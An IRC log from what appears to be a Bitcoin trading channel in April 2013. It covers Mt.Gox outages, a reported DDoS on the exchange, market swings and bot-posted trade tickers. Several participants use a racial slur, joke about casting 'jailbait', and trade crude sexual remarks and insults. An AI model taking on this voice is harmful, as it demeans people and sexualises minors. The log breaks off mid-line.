22:57:00 whereby they have a bunch of bitcoinica funds which two parties are disputing in nz and ca Apr 03 22:57:17 oh yeah, I forgot they still have those Apr 03 22:57:30 thats hardly a burden, they hold btc unitl court ruling Apr 03 22:57:39 that is a nightmare Apr 03 22:57:55 holding btc is a nightmare? Apr 03 22:58:04 so... he's a survivor is what you're saying... Apr 03 22:58:05 dub if they still have it. Apr 03 22:58:17 he's a bottom feeder Apr 03 22:58:21 pgp not rly. btc has no standards is what i'm saying. Apr 03 22:58:24 and in bitcoin that is the best place to feed Apr 03 22:58:36 the other "survivor", bitfloor, lost millions of users funds Apr 03 22:58:42 opened up for business like nothing happened Apr 03 22:58:45 PEOPLE STILL USE THEM. Apr 03 22:58:49 hopefully they stay dossed long enough for a real exchange to open Apr 03 22:58:52 anybody have any insight to the coinlab terms? Apr 03 22:58:52 that place should have just shut down Apr 03 22:59:08 dub won't happen, because people have absolutely no preference for quality. Apr 03 22:59:15 the best exchange is in the us actually- imo Apr 03 22:59:15 they will do things like lend on forum. who cares ? Apr 03 22:59:18 so whats new Apr 03 22:59:24 mircea_popescu: they will move if they can never access gox again Apr 03 22:59:29 so trades appear to slowly be going through, just websockets are down Apr 03 22:59:29 <[\\\]> news? Apr 03 22:59:30 yes. to bitfinex. Apr 03 22:59:30 i'm sure i can just pick some thing Apr 03 22:59:39 some hack, some rally, some press Apr 03 22:59:45 what's the best drama Apr 03 22:59:58 all it takes is someone that isnt a) an existing scammer b) from russia to create an alternative Apr 03 23:00:00 <[\\\]> jcpham: butterfail labs Apr 03 23:00:08 gypsies qualify ? Apr 03 23:00:10 luke-jr still scammin Apr 03 23:00:17 posting fake asic pics on the internets Apr 03 23:00:32 i heard about that Apr 03 23:00:37 #mtgox-RT is slowly getting updates Apr 03 23:00:40 bfl shipping delayed: out of box tape Apr 03 23:01:00 mircea_popescu: it would take a gyppo with PR that doesnt alienate 80% of potential custies Apr 03 23:01:12 ^ Apr 03 23:01:19 i think he referring to someone Apr 03 23:01:27 jcpham: love your trolling, claiming my ASIC is fake Apr 03 23:01:40 dude i read it on reddit Apr 03 23:01:44 it must be true Apr 03 23:01:51 not that I have a problem with that in reference to MPEX, you don't want those 80% but an alt gox needs critical mass Apr 03 23:01:53 i can't come up with this gold Apr 03 23:02:00 if they've put the effort into faking it, I'll be pretty pissed at having to write new drivers Apr 03 23:02:00 [HAVELOCK] [SDICE] 1 @ 0.32100002 BTC [+] Apr 03 23:02:01 [HAVELOCK] [SDICE] 4 @ 0.32100001 = 1.284 BTC [-] Apr 03 23:02:02 [HAVELOCK] [SDICE] 30 @ 0.321 = 9.63 BTC [-] Apr 03 23:02:03 dub that's only because your nose is too big. Apr 03 23:02:03 [HAVELOCK] [SDICE] 23 @ 0.32 = 7.36 BTC [-] Apr 03 23:02:03 luke-jr i want to defend you on the forums sometimes Apr 03 23:02:04 [HAVELOCK] [SDICE] 15 @ 0.30000001 = 4.5 BTC [-] Apr 03 23:02:35 why does everyone attack luke-jr when all he does is help bitcoin Apr 03 23:02:41 mircea_popescu: it helps me breath up all the white mans air Apr 03 23:02:48 jcpham because he helps bitcoin be more like the shithole he lives in Apr 03 23:02:51 ie, a house of failure. Apr 03 23:03:02 you are so harsh mircea_popescu Apr 03 23:04:41 but anyway : i will dare say that a functioning exchange would be a serious problem at this point. Apr 03 23:04:54 the fact they suck creates a lot of friction, which insulates us Apr 03 23:05:06 which turns out to be critical when idiocy like the recent bubble strikes. Apr 03 23:05:40 a better way will emerge Apr 03 23:05:59 certainly, but in a year or so. Apr 03 23:06:12 so far mtgox is a half-baked buggy implementation of capital controls. Apr 03 23:06:14 I think less Apr 03 23:06:44 mircea_popescu what color is your soapbox? Apr 03 23:07:16 it's the color of money Apr 03 23:07:43 <[\\\]> jcpham, that ain't soap Apr 03 23:08:03 lol [\\\] Apr 03 23:08:24 thank god for coinlab amirite trollface Apr 03 23:08:50 so, goxcodes are going away? Apr 03 23:08:57 <[\\\]> frakking coinlab Apr 03 23:09:18 so far coinlab is all talk Apr 03 23:09:21 once your new overlords tell you what you can ant do, everything will be fine Apr 03 23:10:01 it's the color of money << i like this one. Apr 03 23:10:02 there's always bitfloor. you can sell coins for anything over there Apr 03 23:10:09 is coinlab actually an exchange or just handling banking for dwolla users Apr 03 23:10:15 or instead of dwolla Apr 03 23:10:24 <[\\\]> they aren't doing anything at the moment Apr 03 23:10:28 I realise this Apr 03 23:10:32 dub i think everything is the answer Apr 03 23:10:34 i don't think you do. Apr 03 23:10:35 the exchange Apr 03 23:10:41 for sure Apr 03 23:10:46 <[\\\]> so then to indicate what they are doing is a bit premature Apr 03 23:10:51 bitfloor is a good tech all around, but one man show is a problem Apr 03 23:11:02 <[\\\]> coinlabs is attempting to be the USD exchanger Apr 03 23:11:02 the kid is talented, granted. Apr 03 23:11:03 one idiot show Apr 03 23:11:08 but he has the geek disease. Apr 03 23:11:09 <[\\\]> and mtgox will be the btc exchanger Apr 03 23:11:29 i've met with him several times... Apr 03 23:11:30 there was an article from this week where Mark basically says mtgox wants coinlab to handle the US, they don't want to fool with anything in the US Apr 03 23:11:42 you can lead a horse to water Apr 03 23:11:54 <[\\\]> oh, it'll drink Apr 03 23:12:03 <[\\\]> either willingly or once it passes the hell out Apr 03 23:12:18 <[\\\]> hold its head under the water long enough, it'll drink Apr 03 23:13:25 an equestrian, i see. Apr 03 23:13:32 <[\\\]> nah Apr 03 23:13:39 http://www.forbes.com/sites/timothylee/2013/04/03/four-reason-you-shouldnt-buy-bitcoins/ Apr 03 23:13:47 <[\\\]> hold any creature underwater long enough and it'll drink Apr 03 23:14:05 my bad, a biologist. Apr 03 23:14:07 [\\\] even spanish galleons ? Apr 03 23:14:44 ok so the link, the name of the article is "4 reasons you shouldn't buy bitcoins" Apr 03 23:14:47 last paragraph: Conclusion. With all that said, I think there’s a good chance that Bitcoins will continue to appreciate. I still have the majority of the Bitcoins I bought in early 2012 and I plan to hold onto them for a while to see what happens. Apr 03 23:14:55 5th reason, dicks everywhere Apr 03 23:14:56 so fucking classic Apr 03 23:15:53 he wants cheap btc Apr 03 23:17:31 lol Apr 03 23:18:34 reagrding his 3rd point... aren't there plans to possibly prune the blockchain? Apr 03 23:18:43 heh http://afiler.com/five-bytecoin-note/ Apr 03 23:19:03 so im looking at the bfl asic and all i can think of is Apr 03 23:19:06 dude... where's the fans ?! Apr 03 23:19:25 they demo'd a box of fans and then their board is passive cooled ?! Apr 03 23:19:52 yep Apr 03 23:20:05 are there more pics or just the luke-jr fakes? Apr 03 23:20:18 <[\\\]> mircea_popescu: you weren't supposed to notice Apr 03 23:20:38 !t h sdice Apr 03 23:20:39 [HAVELOCK:SDICE] 1D: 0.30000000 / 0.34500832 / 0.40000010 (513 shares, 176.98926940 BTC), 7D: 0.30000000 / 0.38560232 / 0.46500000 (1790 shares, 690.22815553 BTC), 30D: 0.30000000 / 0.46949071 / 0.62950000 (6155 shares, 2889.71533662 BTC) Apr 03 23:20:46 dub i was looking at the luke ones Apr 03 23:21:04 [\\\] so now wat ? Apr 03 23:21:21 working 41min @180w without fan? April fool Apr 03 23:21:25 other ppl noticed too Apr 03 23:22:08 what the crap is a bytecoin Apr 03 23:22:20 whats the chance of dice going back over IPO price? Apr 03 23:22:21 and are there 8 bitcoins to a bytecoin Apr 03 23:22:26 otherwise forget it Apr 03 23:22:28 Im thinking slim to no fucking way Apr 03 23:22:35 !ticker m s.dice Apr 03 23:22:37 [MPEX:S.DICE] 1D: 0.00310001 / 0.00331495 / 0.00400173 (29681 shares, 98.39 BTC), 7D: 0.0031 / 0.00327191 / 0.00439992 (696729 shares, 2,279.64 BTC), 30D: 0.00300001 / 0.00422354 / 0.006225 (1578660 shares, 6,667.54 BTC) Apr 03 23:23:03 i'd say it depends on what they do with bets. Apr 03 23:23:35 good old fashioned deflation Apr 03 23:23:58 better to just hold the damn coins Apr 03 23:24:54 jcpham: https://bitcointalk.org/index.php?topic=164569.0 Apr 03 23:25:04 Maria coins Apr 03 23:25:30 I have some for sale btw Apr 03 23:26:35 ;;ticker Apr 03 23:26:37 Error: Failure to retrieve ticker. Try again later. Apr 03 23:27:05 satoshidice already up 1000 bitcoins this month Apr 03 23:27:30 this chart looks ugly Apr 03 23:28:59 [HAVELOCK] [VTX] 1 @ 0.44899999 BTC [+] Apr 03 23:29:00 [HAVELOCK] [VTX] 2 @ 0.45 = 0.9 BTC [+] Apr 03 23:29:22 ;;ticker Apr 03 23:29:23 Error: Failure to retrieve ticker. Try again later. Apr 03 23:29:41 not that much coin on either side for 10 points... Apr 03 23:32:19 [BTCTC] [SYNERGY] 1 @ 0.0125 BTC [+] Apr 03 23:32:25 [BTCTC] [SYNERGY] 3 @ 0.0125 = 0.0375 BTC [+] Apr 03 23:34:34 [BTCTC] [ASICMINER-PT] 2 @ 0.7407 = 1.4814 BTC [-] Apr 03 23:34:45 [BTCTC] [ASICMINER-PT] 2 @ 0.74 = 1.48 BTC [-] Apr 03 23:34:46 [BTCTC] [S.BBET-PT] 15 @ 0.00177 = 0.0266 BTC [+] Apr 03 23:34:48 [BTCTC] [ASICMINER-PT] 4 @ 0.733 = 2.932 BTC [-] Apr 03 23:34:51 [BTCTC] [ASICMINER-PT] 1 @ 0.73 BTC [-] Apr 03 23:34:53 [BTCTC] [ASICMINER-PT] 2 @ 0.7006 = 1.4012 BTC [-] Apr 03 23:34:56 [BTCTC] [ASICMINER-PT] 2 @ 0.7005 = 1.401 BTC [-] Apr 03 23:35:09 [BTCTC] [ASICMINER-PT] 3 @ 0.7 = 2.1 BTC [-] Apr 03 23:35:11 [BTCTC] [ASICMINER-PT] 4 @ 0.69 = 2.76 BTC [-] Apr 03 23:35:15 [BTCTC] [ASICMINER-PT] 3 @ 0.683004 = 2.049 BTC [-] Apr 03 23:35:17 [BTCTC] [ASICMINER-PT] 6 @ 0.683004 = 4.098 BTC [-] Apr 03 23:36:07 not a lot of depth to that book, eh? Apr 03 23:36:19 holy shit Apr 03 23:36:22 oh my Apr 03 23:36:57 feeling better about the cashing out now Apr 03 23:37:19 ;;goxlag Apr 03 23:37:20 MtGox lag is 6.54048 seconds. During this time, light travels 0.0131070486891 AU. You could have sent a bitcoin from Jupiter to its second largest moon, Callisto (0.012567 AU). Apr 03 23:37:35 now about those calls.... Apr 03 23:39:14 ;;bids 0 Apr 03 23:39:15 There are currently 30745238 bitcoins demanded at or over 0.0 USD, worth 8109918.25254 USD in total. | Data vintage: 146.6280 seconds Apr 03 23:39:20 ugh Apr 03 23:39:22 weak Apr 03 23:40:06 not weak at all. At least not in the higher priced orderbook Apr 03 23:42:11 ;;goxlag Apr 03 23:42:12 Error: Problem retrieving gox lag. Try again later. Apr 03 23:43:03 8.1M is the weakest I've seen since the last flashcrash Apr 03 23:43:13 although a lot of that was just wiped out Apr 03 23:43:31 mircera's blog post killed the bubble. :( Apr 03 23:43:45 price looks stable now. More bids than asks... Apr 03 23:44:00 I have a feeling we're not done yet with this bubble-thing Apr 03 23:44:33 mircea_popescu has a blog? Apr 03 23:46:06 so gox is working via api only? Apr 03 23:54:07 It might break 100 Apr 03 23:54:16 I think so Apr 03 23:54:17 whats the 61.8% retrace? Apr 03 23:54:40 $90.48 Apr 03 23:54:49 Might set some buys up at 91 Apr 03 23:55:03 jcpham o you didn't klnow ? Apr 03 23:55:15 nah negro Apr 03 23:55:20 sure did not Apr 03 23:55:23 here we go... Apr 03 23:55:25 oh hai 502, my old friend Apr 03 23:55:55 jcpham must be cause you're new. Apr 03 23:55:56 U gonna need to buy some credits boy Apr 03 23:56:13 i'll get the hang of this internet thing one day Apr 03 23:56:20 double-click Apr 03 23:56:31 it's spelled double-clit Apr 03 23:56:52 my mind just lit up with that visualization Apr 03 23:57:00 [HAVELOCK] [SDICE] 1 @ 0.35929989 BTC [+] Apr 03 23:57:01 [HAVELOCK] [SDICE] 1 @ 0.3592999 BTC [+] Apr 03 23:57:03 [HAVELOCK] [SDICE] 1 @ 0.35929991 BTC [+] Apr 03 23:57:03 [HAVELOCK] [SDICE] 1 @ 0.35929993 BTC [+] Apr 03 23:57:04 [HAVELOCK] [SDICE] 1 @ 0.35929995 BTC [+] Apr 03 23:57:05 [HAVELOCK] [SDICE] 1 @ 0.35929997 BTC [+] Apr 03 23:57:06 [HAVELOCK] [SDICE] 1 @ 0.35929999 BTC [+] Apr 03 23:57:07 [HAVELOCK] [SDICE] 1 @ 0.3593 BTC [+] Apr 03 23:57:08 [HAVELOCK] [SDICE] 1 @ 0.35939999 BTC [+] Apr 03 23:57:09 [HAVELOCK] [SDICE] 2 @ 0.3595 = 0.719 BTC [+] Apr 03 23:57:10 is that 4 clicks per clit? Apr 03 23:57:10 hmm Apr 03 23:57:14 ok... gox is doing this on purpose... Apr 03 23:57:15 why is sell Apr 03 23:57:29 wao probably somebody needed small change. Apr 03 23:57:41 Bugpowder: url for mircera blog post? Apr 03 23:58:30 mircea_popescu: do you want to be in a documentary re: bitcoin? Was talking to a super early adopter that has been making a doc for the past 2 years. I think he has more liquid coin than you... Apr 03 23:58:47 not particularly. Apr 03 23:58:54 aiiight Apr 03 23:59:20 its actually half doc / half porn. Apr 03 23:59:27 babes of bitcoin Apr 04 00:00:20 wao http://trilema.com/2013/people-bitcoin-is-not-worth-100-dollars-per-stop-buying Apr 04 00:00:24 he just can't spell. Apr 04 00:00:56 hmm Apr 04 00:01:12 < Bugpowder> its actually half doc / half porn. Apr 04 00:01:12 lol Apr 04 00:02:16 [BTCTC] [COGNITIVE] 3 @ 0.147 = 0.441 BTC [+] Apr 04 00:02:20 [BTCTC] [COGNITIVE] 1 @ 0.14319 BTC [-] Apr 04 00:02:22 [BTCTC] [COGNITIVE] 6 @ 0.143 = 0.858 BTC [-] Apr 04 00:02:25 [BTCTC] [COGNITIVE] 20 @ 0.14 = 2.8 BTC [-] Apr 04 00:02:34 [MPEX] [S.DICE] 1550 @ 0.00333521 = 5.1696 BTC [+] Apr 04 00:02:57 ;;bids 0 Apr 04 00:02:58 There are currently 30741115 bitcoins demanded at or over 0.0 USD, worth 7716124.53316 USD in total. | Data vintage: 151.0175 seconds Apr 04 00:03:00 [HAVELOCK] [VTX] 3 @ 0.45 = 1.35 BTC [+] Apr 04 00:03:03 oh jesus Apr 04 00:03:15 [BTCTC] [RSM] 1 @ 0.005 BTC [+] Apr 04 00:03:27 [BTCTC] [COGNITIVE] 30 @ 0.1313 = 3.939 BTC [-] Apr 04 00:03:33 isn't there normally more like $10MM on bid side? Apr 04 00:03:58 come on $2 Apr 04 00:04:46 well if by normally you mean in the last 3 days of insane buying, yes. Apr 04 00:04:59 [HAVELOCK] [VTX] 2 @ 0.45 = 0.9 BTC [+] Apr 04 00:05:13 even a week ago... Apr 04 00:05:22 $avg Apr 04 00:05:24 thestringpuller: 129.26 Apr 04 00:05:35 a lot of bids have been pulled Apr 04 00:05:53 [BTCTC] [COGNITIVE] 3 @ 0.125 = 0.375 BTC [-] Apr 04 00:05:55 [BTCTC] [COGNITIVE] 40 @ 0.12104 = 4.8416 BTC [-] Apr 04 00:06:00 [HAVELOCK] [VTX] 3 @ 0.45 = 1.35 BTC [+] Apr 04 00:06:00 ;;seen smickles Apr 04 00:06:00 smickles was last seen in #bitcoin-assets 4 hours, 12 minutes, and 56 seconds ago: well, poo Apr 04 00:06:06 Bugpowder: hey Apr 04 00:06:10 yo Apr 04 00:06:35 [BTCTC] [COGNITIVE] 75 @ 0.12102 = 9.0765 BTC [-] Apr 04 00:06:43 !ticker H HIM Apr 04 00:06:44 [HAVELOCK:HIM] 1D: 1.87000000 / 1.94453478 / 2.00000000 (23 shares, 44.72430000 BTC), 7D: 1.80000000 / 1.92572839 / 2.08000000 (162 shares, 311.96799996 BTC), 30D: 1.40001001 / 1.80151405 / 2.08000000 (737 shares, 1327.71585265 BTC) Apr 04 00:07:37 ;;asks 200 Apr 04 00:07:37 There are currently 30794.949 bitcoins offered at or under 200.0 USD, worth 4689431.10089 USD in total. | Data vintage: 73.3201 seconds Apr 04 00:10:51 $oix Apr 04 00:10:59 oops Apr 04 00:11:03 !ticker m ^oix Apr 04 00:11:05 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 93.3570601 / 108.23895332 / 135.79703245 (19608 shares, 8,036.44 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 04 00:11:06 nice Apr 04 00:11:16 let's see how long this lasts Apr 04 00:11:32 ;;bids 80 Apr 04 00:11:34 There are currently 33883.478 bitcoins demanded at or over 80.0 USD, worth 3259848.25857 USD in total. | Data vintage: 0.0051 seconds Apr 04 00:11:51 so apparently anonymous took up mircea_popescu's call to pretect freedom by preventing the rise of bitcoin, but instead of selling btc as their methodology, they are ing using a ddos against mtgox. Hey if it can't trade it can't rise. ;) Apr 04 00:12:05 is mt gox ddos'd? Apr 04 00:12:11 sorry for typos.. Apr 04 00:12:21 yeah Apr 04 00:12:27 has been most all day Apr 04 00:12:34 but it's starting to pull through Apr 04 00:12:37 bgupta everybody's been ddos'd all year Apr 04 00:12:42 the only difference is they kinda suck at it. Apr 04 00:12:45 ;;ticker Apr 04 00:12:46 (ie, cloudflare and bs) Apr 04 00:12:52 BTCUSD ticker | Best bid: 115.10000, Best ask: 115.19999, Bid-ask spread: 0.09999, Last trade: 115.20000, 24 hour volume: 134283.56443513, 24 hour low: 113.47500, 24 hour high: 147.00000, 24 hour vwap: 128.50960 Apr 04 00:14:27 mircea_popescu: Well you gotta admit that the ddos took the wind out any thought of a retry at insane rally today. Apr 04 00:14:57 not rly. Apr 04 00:15:16 135k traded today. Apr 04 00:15:24 You think a ddos against the major btc exchange would help a rally? Apr 04 00:15:33 hmm... how is the reddit sentiment index doing Apr 04 00:15:35 it can do either, in principle. why not ? Apr 04 00:15:47 https://blockchain.info/unconfirmed-transactions keeps rising Apr 04 00:15:57 moreover, as shockingly crummy service this is, it's not much outside of mtgox normal range. Apr 04 00:16:10 banned in 3 2 1 Apr 04 00:16:12 muhaha Apr 04 00:16:28 dub: except that'd be illegla Apr 04 00:16:31 they should just ask theymos for some of the stash Apr 04 00:16:39 wow, that is a lot of unconfirmed Apr 04 00:16:49 you know this unconfirmed stuff is starting to worry Apr 04 00:16:57 it kinda serves the same purpose of a short circuit, breaking whatever momentum insanity is going on in market Apr 04 00:16:58 FUck. Apr 04 00:16:59 I'm Raising My Bitcoin Price Target To $400 Henry Blodget Read more: http://www.businessinsider.com/im-raising-my-bitcoin-price-target-to-400-2013-4#ixzz2PRBAUZVk Apr 04 00:17:03 what with the decrease in nodes it could be actually connectivity issues that prevent txs from making it into mempools Apr 04 00:17:03 4400, new record Apr 04 00:17:16 i see 5.3k Apr 04 00:17:24 we are showing 855 nodes today Apr 04 00:17:39 oh really, 5.3- really new record Apr 04 00:17:46 good by 113 Apr 04 00:17:47 jborkl i am thinking : if they aren't well distributed (ie, concentrated in major dc hubs) Apr 04 00:18:00 then the latency to move txs around could actually account for some of the uncofirmed pile Apr 04 00:18:35 jborkl oryou meant total kb ? Apr 04 00:18:45 ;;ticker Apr 04 00:18:47 BTCUSD ticker | Best bid: 113.50000, Best ask: 115.00000, Bid-ask spread: 1.50000, Last trade: 115.00000, 24 hour volume: 134283.56443513, 24 hour low: 113.47500, 24 hour high: 147.00000, 24 hour vwap: 128.50960 Apr 04 00:18:57 ;;nodes Apr 04 00:18:57 Error: "nodes" is not a valid command. Apr 04 00:19:01 ;;goxlag Apr 04 00:19:01 Error: Problem retrieving gox lag. Try again later. Apr 04 00:19:02 I have seen many people reporting 12-15 hours on transactions with fees Apr 04 00:19:17 yikes Apr 04 00:19:18 jborkl: i'm up to 6 Apr 04 00:19:22 depends on what time of day and what is going on Apr 04 00:19:27 ^ that. Apr 04 00:19:34 that supports the connectivity issue. Apr 04 00:19:35 11:32am est Apr 04 00:19:50 still uncnfmd Apr 04 00:19:54 i have a tx with 0 confirms from like 6 hrs ago Apr 04 00:20:03 $110 Apr 04 00:20:20 whats happening? Apr 04 00:20:27 the correction Apr 04 00:20:31 tell you the truth- I noticed after most people rolled out .81 Apr 04 00:20:58 ;;bids 0 Apr 04 00:21:01 There are currently 30744690 bitcoins demanded at or over 0.0 USD, worth 7807337.72401 USD in total. | Data vintage: 0.0097 seconds Apr 04 00:21:09 opening in July 2013 'The Correction' starring angelina jolie. Apr 04 00:21:11 but, there was also a huge price swing at the same time, so hard to tell Apr 04 00:21:17 I got bids starting at $91.8 anyone else? Apr 04 00:21:23 wow Apr 04 00:21:45 deadweasel some younger chick pls. Apr 04 00:22:08 kate upton? Apr 04 00:22:13 cavirtex, bid starts at 103 cad Apr 04 00:22:15 starring some jailbait Apr 04 00:22:22 Bakewell is gonna show back up any minute now Apr 04 00:22:26 lol Apr 04 00:22:39 Dree Hemingway Apr 04 00:22:48 http://2.bp.blogspot.com/_pmtDGABuoJE/TIhDLD3nYfI/AAAAAAAACHc/qFjrZonBn80/s1600/43881_Dree_Hemingway10_PurpleFW09_10_123_67lo.jpg Apr 04 00:22:59 !!! Apr 04 00:23:05 yes please Apr 04 00:23:13 my txn from yesterday that was so screwy confirmed Apr 04 00:23:58 [HAVELOCK] [KCIM] 1 @ 1.1 BTC [-] Apr 04 00:24:59 [HAVELOCK] [VTX] 2 @ 0.45 = 0.9 BTC [+] Apr 04 00:25:00 [HAVELOCK] [VTX] 5 @ 0.45 = 2.25 BTC [+] Apr 04 00:25:11 i think never seen this before on mtgox Apr 04 00:25:53 poor gox trading engine Apr 04 00:26:00 i think i can, i think i can Apr 04 00:26:29 !ticker h him Apr 04 00:26:31 [HAVELOCK:HIM] 1D: 1.87000000 / 1.94453478 / 2.00000000 (23 shares, 44.72430000 BTC), 7D: 1.80000000 / 1.92572839 / 2.08000000 (162 shares, 311.96799996 BTC), 30D: 1.40001001 / 1.80151405 / 2.08000000 (737 shares, 1327.71585265 BTC) Apr 04 00:26:52 I wonder if mtgox is halting on purpose to prevent price crashes Apr 04 00:27:32 crashing on btc-e Apr 04 00:27:37 doesn't seem to be workingtoo well if they are. Apr 04 00:27:49 of course it doesnt work :| Apr 04 00:27:57 EU did something where they banned short sales Apr 04 00:28:01 apparently the ddos is mitigated Apr 04 00:28:05 or close down exchanges after a certain % drop Apr 04 00:28:09 please login and sell all your coin Apr 04 00:28:31 closing down would be the stupidest fucking thing in bitcoinland Apr 04 00:28:45 close down at the bottom, you don't get a bounce. Apr 04 00:29:26 have you been to bitcoinland? I don't even want to think about the level of stupid you would need to get that low Apr 04 00:29:48 taub it's been traditional in fiat to halt trading after drops Apr 04 00:29:59 this was originally good and needed, because people needed to arrange backing. Apr 04 00:30:06 bottom, wtf are you talking about- we went from $20 to $150 Apr 04 00:30:11 well Apr 04 00:30:24 but not in the time of high speed electronic exchanges Apr 04 00:30:28 it did not need to be at 150 yet Apr 04 00:30:36 ya well, diff thing i agree. Apr 04 00:30:43 [MPEX] [O.USD.P089T] 200 @ 0.08390371 = 16.7807 BTC [-] Apr 04 00:30:50 Bugpowder: what I don't like about today is api was still workign while web is down Apr 04 00:30:51 i don't think halting is a good idea in btc. Apr 04 00:30:59 [HAVELOCK] [VTX] 5 @ 0.45 = 2.25 BTC [+] Apr 04 00:31:03 web is working sometimes Apr 04 00:31:11 worked for me 10 minutes ago Apr 04 00:31:17 I think its fixed now Apr 04 00:31:23 ;;bids 0 Apr 04 00:31:25 as of 10 minutes ago oslt Apr 04 00:31:25 There are currently 30759476 bitcoins demanded at or over 0.0 USD, worth 7586263.08014 USD in total. | Data vintage: 0.0238 seconds Apr 04 00:31:28 inability to trade shakes faith in system and causes people to panic sell. Apr 04 00:31:54 that guy that had the wall at 90 needs to step in if we ping 90. Apr 04 00:31:59 [HAVELOCK] [VTX] 9 @ 0.46 = 4.14 BTC [+] Apr 04 00:32:12 ;;goxlag Apr 04 00:32:12 MtGox lag is 648.276674 seconds. During this time, light travels 1.29913919623 AU. You could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 04 00:32:16 at least it's alive! Apr 04 00:32:16 !ticker OIX Apr 04 00:32:18 The vision of Christ that thou dost see ... is my vision's greatest enemy. Apr 04 00:32:20 !ticker m ^OIX Apr 04 00:32:22 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 93.3570601 / 108.23895332 / 135.79703245 (19608 shares, 8,036.44 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 04 00:32:40 well, one guy cant stop it all by himself Apr 04 00:32:40 what, are we panicking the other way nao ? Apr 04 00:32:44 why are people so excitable. Apr 04 00:33:03 I don't know Apr 04 00:33:05 I've got a bid at 88.8 because china Apr 04 00:33:13 isnt that 555 ? Apr 04 00:33:29 no its tiger penis Apr 04 00:33:35 that guy had an order for 15 or 20k coins at 90. Apr 04 00:33:45 maybe 10-15. Apr 04 00:33:53 he CAN stop it. Apr 04 00:34:16 but why stop it till it gets that low. Apr 04 00:36:51 why not 88.888 Apr 04 00:36:56 the five eights account Apr 04 00:37:10 reference to the account that brought down barings bank Apr 04 00:41:15 trading below the 24h avg Apr 04 00:41:29 doesnt happen often, but lately hasn't meant much either Apr 04 00:45:03 this is what happens when you fly too close to the sun Apr 04 00:45:39 [BTCTC] [BTC-BOND] 1 @ 0.009998 BTC [+] Apr 04 00:45:43 ;;bids Apr 04 00:45:43 (bids [--under] ) -- Calculate the amount of bitcoin demanded at or over . If '--under' option is given, find coins or at or under . Apr 04 00:45:47 ;;bids 0 Apr 04 00:45:47 There are currently 30793298 bitcoins demanded at or over 0.0 USD, worth 7900811.43311 USD in total. | Data vintage: 18.9365 seconds Apr 04 00:45:58 i hate being right Apr 04 00:46:00 and not making any money Apr 04 00:46:06 lol its the worst Apr 04 00:46:09 woohoo Apr 04 00:46:20 someone needs to create vix for btc Apr 04 00:46:27 oh wait, that might just be btc itself Apr 04 00:46:48 what the fuck Apr 04 00:47:00 buys finally made it to the engine lol **** BEGIN LOGGING AT Thu Apr 4 07:29:21 2013 Apr 04 07:29:22 I ran the test at bitminter.com/test Apr 04 07:29:35 and it even said my gpu was at 10.2 mh/s Apr 04 07:29:47 well... let's drop the bomb in #mtgox Apr 04 07:30:03 O_o Apr 04 07:32:58 [BTCTC] [BASIC-MINING] 2 @ 0.39 = 0.78 BTC [+] Apr 04 07:33:02 [HAVELOCK] [VTX] 9 @ 0.4 = 3.6 BTC [-] Apr 04 07:34:25 <[\\\]> note to self, always go mudding with the windows open: http://omg.yahoo.com/blogs/celeb-news/buckwild-production-companies-paying-shain-gandee-funeral-140430505.html Apr 04 07:34:41 [BTCTC] [S.MPOE-PT] 4 @ 0.000658 = 0.0026 BTC [+] Apr 04 07:35:05 [\\\] i see your note and raise you http://www.dailymail.co.uk/news/article-2303287/Indian-engineers-invent-anti-rape-underwear-gives-attackers-electric-shocks-automatically-texts-police-help.html Apr 04 07:36:15 also 4000 per episode ?! bwagagagaga who the fuck does this ? Apr 04 07:36:27 random girl in pornscene makes that Apr 04 07:36:28 <[\\\]> mircea_popescu: a bunch of hillbillies who have no future Apr 04 07:36:34 who the fuck thinks that's a star. Apr 04 07:36:42 <[\\\]> mircea_popescu: I saw your shocker and raise you a man with no penis: http://shine.yahoo.com/healthy-living/eric-ducharme--the-real-life-mermaid-200251696.html Apr 04 07:36:51 o ya ? Apr 04 07:38:02 i see your man with no penis and i give you a matress with a safe : http://www.guardian.co.uk/business/shortcuts/2013/mar/29/mattress-safe-bank-with-confidence Apr 04 07:42:22 meanwhile on twitter : Apr 04 07:42:44 Adam Posen @AdamPosen (President, Peterson Institute for International Economics; member Bank of England MPC 2009-12; advises central banks & governments; proclaiming on policy daily) : #gold is the investment for silly people. #bitcoin is gold for people who don't save. Please make it go away. pic.twitter.com/UdbbxCiNXD Apr 04 07:43:01 Mircea Popescu ‏@Mircea_Popescu 54s @AdamPosen What are you, like some sort of retard with a high self esteem ? Apr 04 07:48:16 and let's hammer [\\\] into the ground with this coup de grace killing blow final strike : http://www.theblaze.com/stories/2013/04/03/man-who-gave-birth-to-three-babies-unsuccessfully-begs-for-a-divorce-in-this-odd-legal-conundrum/ Apr 04 07:50:30 *boggle* Apr 04 07:52:15 hai mod6 Apr 04 07:52:46 hi :] Apr 04 07:53:03 people in arizona are getting more strange i see Apr 04 07:53:09 [BTCTC] [ASICMINER-PT] 2 @ 0.7003 = 1.4006 BTC [-] Apr 04 07:53:12 [BTCTC] [ASICMINER-PT] 1 @ 0.7002 BTC [-] Apr 04 07:53:14 [BTCTC] [ASICMINER-PT] 5 @ 0.7001 = 3.5005 BTC [-] Apr 04 07:53:20 [BTCTC] [ASICMINER-PT] 24 @ 0.7 = 16.8 BTC [-] Apr 04 07:55:18 it's a sliding scale. Apr 04 07:55:33 ya, arizona still pretty much kicks ass tho Apr 04 07:56:08 i guess it depends Apr 04 07:57:03 i prefer texas as far as desert states go. Apr 04 07:57:35 i never spent too much time there. drove across it once though. fast. Apr 04 07:58:10 1. pretty much all bartenders are fuckable chicks ; 2. they buy me drinks like it's their bar and i'm their bro. Apr 04 07:58:12 (ymmv) Apr 04 07:58:31 haha nice Apr 04 07:59:52 contrary to what people of walmart may lead you to believe, Apr 04 07:59:55 there are some. Apr 04 08:00:01 bingo Apr 04 08:00:25 http://www.guardian.co.uk/uk/2013/apr/03/offshore-secrets-offshore-tax-haven Apr 04 08:00:27 that website has some serious feature-creatures Apr 04 08:00:27 bwahahaha Apr 04 08:01:09 when I worked nights at walmart in tucson you see it all i tell you Apr 04 08:01:13 just... wow. Apr 04 08:03:32 dang $32tn Apr 04 08:05:25 basically this is all moving into bitcoin. Apr 04 08:06:33 seems like it Apr 04 08:06:42 The whistleblowing group WikiLeaks caused a storm of controversy in 2010 when it was able to download almost two gigabytes of leaked US military and diplomatic files. Apr 04 